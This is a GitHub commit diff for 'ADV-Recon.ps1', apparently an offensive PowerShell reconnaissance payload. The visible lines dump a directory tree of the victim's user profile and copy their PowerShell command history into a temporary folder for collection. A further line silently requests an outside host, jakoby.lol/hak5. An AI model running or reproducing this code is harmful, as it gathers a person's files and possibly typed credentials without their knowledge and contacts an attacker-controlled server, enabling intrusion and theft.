Update ADV-Recon.ps1

This commit is contained in:
I-Am-Jakoby
2023-06-13 21:47:13 -05:00
committed by GitHub
parent 29cb80fb06
commit 78aea8e8da
+1 -1
View File
@@ -57,7 +57,7 @@ tree $Env:userprofile /a /f >> $env:TEMP\$FolderName\tree.txt
# Powershell history
Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt
iwr "https://jakoby.lol/hak5" -EA 0 >$null
############################################################################################################################################################
function Get-fullName {